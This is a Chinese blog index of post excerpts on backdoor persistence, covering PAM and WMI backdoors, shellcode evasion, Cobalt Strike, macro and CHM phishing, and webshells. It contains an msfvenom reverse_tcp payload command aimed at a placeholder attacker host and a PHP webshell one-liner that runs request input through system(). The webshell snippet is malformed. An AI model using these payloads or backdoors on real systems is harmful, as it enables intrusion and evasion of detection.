随笔分类 - 后门维持
摘要:首发先知社区: https://xz.aliyun.com/t/7902 前言 渐渐发现 pam后门 在实战中存在 种植繁琐、隐蔽性不强 等缺点,这里记录下学习pam后门相关知识和pam后门的拓展改进。 0x01 PAM Backdoor PAM 是一种认证模块,PAM可以作为Linux登录验证和各
阅读全文
摘要:首发先知: https://xz.aliyun.com/t/7170 自己还是想把一些shellcode免杀的技巧通过白话文、傻瓜式的文章把技巧讲清楚。希望更多和我一样web狗也能动手做到免杀的实现。 文中我将shellcode免杀技巧分为 "分离“、”混淆“两个大类,通过不同技巧针对不同检测方式,
阅读全文
摘要:一个很好的学习网站 推荐一下: https://docs.microsoft.com/zh-cn/windows/win32/api/ 0x01 VirtualAlloc VirtualAlloc: 在虚拟地址空间中预定一块内存区域; VirtualAlloc是Windows提供的API,通常用来分
阅读全文
摘要:最近用的多 一个实用小tips 文章参考原创Shadow Force大牛 翻译文章参考三好大佬 利用MSDTC服务加载后门dll,实现自启动后门 后门思路可以查看趋势科技文章 https://blog.trendmicro.com/trendlabs-security-intelligence/sh
阅读全文
摘要:2019.9.20得知非官网的一些下载站中的phpstudy版本存在后门文件 说是官网下的就没有后门 20号出现的新闻 今天phpstudy官网21号又更新一波 不太好说这是什么操作哦 此地无银三百两? 很开心的说 我以前的虚拟机装的应该是有后门版本(任何文件我从来都是官网下文件) 用chamd5的
阅读全文
摘要:0x01 Metasploit派生shell给Cobaltstrike 生成木马: msf派生给cs: 然后在cobaltstrike中创建一个windows/foreign/reverse_tcp Listener,并根据metasploit监听配置cobaltstrike的listener cs
阅读全文
摘要:最近还是重新补一下cs的东西 0x01 Beacon命令 interact来使用Beacon Beacon可以选择通过DNS还是HTTP协议出口网络,你甚至可以在使用Beacon通讯过程中切换HTTP和DNS。 为了能快速显示结果,可以设置 beacon>sleep 0 0x02 常用beacon隧
阅读全文
摘要:玩了几天 刚回成都 玩电脑复现一下~ 内核漏洞原理暂时 没看懂 别问 ,问就是不懂 0x01 复现环境和Exp准备 漏洞影响范围 Windows 7 Windows Server 2008 R2 Windows Server 2008 Windows 2003 Windows XP 靶机环境准备 M
阅读全文
摘要:补充一下端口复用的知识 0x01 关于端口复用 端口复用也是很老的后门技术,主要是劫持web服务器相关进程/服务的内存空间、系统API甚至劫持网络驱动去达到目的, 在winsocket的实现中,对于服务器的绑定是可以多重绑定的,在确定多重绑定使用谁的时候,根据一条原则是谁的指定最明确则将包递交给谁,
阅读全文
摘要:贴上使用笔记 不多介绍了 很简单的东西 msfvenom各平台生成木马大全: windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/sh
阅读全文
摘要:水一水最近玩的工具 弄dll注入的时候用到的 介绍这款老工具 免杀效果一般。。但是简单实用 目录: 0x01 backdoor-factory简介 0x02 特点功能 0x03 具体参数使用 PS:后门添加私钥证书 https://tools.kali.org/exploitation-tools/
阅读全文
摘要:0x01 前言 WMIC扩展WMI(Windows Management Instrumentation,Windows管理工具),提供了从命令行接口和批命令脚本执行系统管理的支持。 在2015年的blackhat大会上Matt Graeber介绍了一种无文件后门就是用的wmi。 https://w
阅读全文
摘要:0×01 利用Cobalt strike生成木马 这里我们生成木马可以用cs带的HTA、OFFICE宏、word宏来使目标上线cs,这里以word宏病毒为例子。 首先我们需要制作一个word宏病毒来进行远控操作。在Cobalt strike中,需要新建一个监听程序来进行监听,如下图: 然后点击att
阅读全文
摘要:CHM钓鱼 CHM介绍 CHM(Compiled Help Manual)即“已编译的帮助文件”。它是微软新一代的帮助文件格式,利用HTML作源文,把帮助内容以类似数据库的形式编译储存。利用CHM钓鱼主要原因是因为该文档可以执行cmd命令 这里制作CHM需要用到一个工具就是 EasyCHM CHM制
阅读全文
摘要:System Profiler使用 System Profiler 模块,搜集目标的各类机器信息(操作系统版本,浏览器版本等) 当受害者访问http://192.168.5.6:80/oa链接时,会跳转到百度页面,同时Cobalt Strike会收集受害者信息,下面页面查看 hta 钓鱼 paylo
阅读全文
摘要:简介 reverse shell反弹shell或者说反向shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 通常用于被控端因防火
阅读全文
摘要:0x01 简单分析 web渗透中很常见的情况,用菜刀连接免杀的一句话木马连不上,有waf 除了变形一句话木马为免杀一句话,我们还需要来制作过waf的菜刀进行连接、 这里用的一句话为 来看看菜刀连接一句话的时候的包 把其中url编码转换后就很直观了: 这里可以看到z0就是执行的操作代码了,base64
阅读全文
摘要:一、各种webshell 一句话木马,其形式如下所示: <?php if(isset(_REQUEST['cmd'])){_REQUEST['cmd'])){cmd = (REQUEST["cmd"]);system(cmd); echo "</pre>$cmd<pre>"; die; } ?> <?php if(iss
阅读全文
摘要:整理大部分来源信安之路 对于隐蔽来说,有以下几点要素: 1、熟悉环境,模拟环境,适应环境,像一只变色龙一样隐藏 2、清除痕迹,避免运维发现 3、避免后门特征值被 D 盾等工具检测到 姿势 一般过狗思路 最一般的绕狗、后门思路就是 直接参数回调,将$_REQUEST['pass']传入的数据,传递给
阅读全文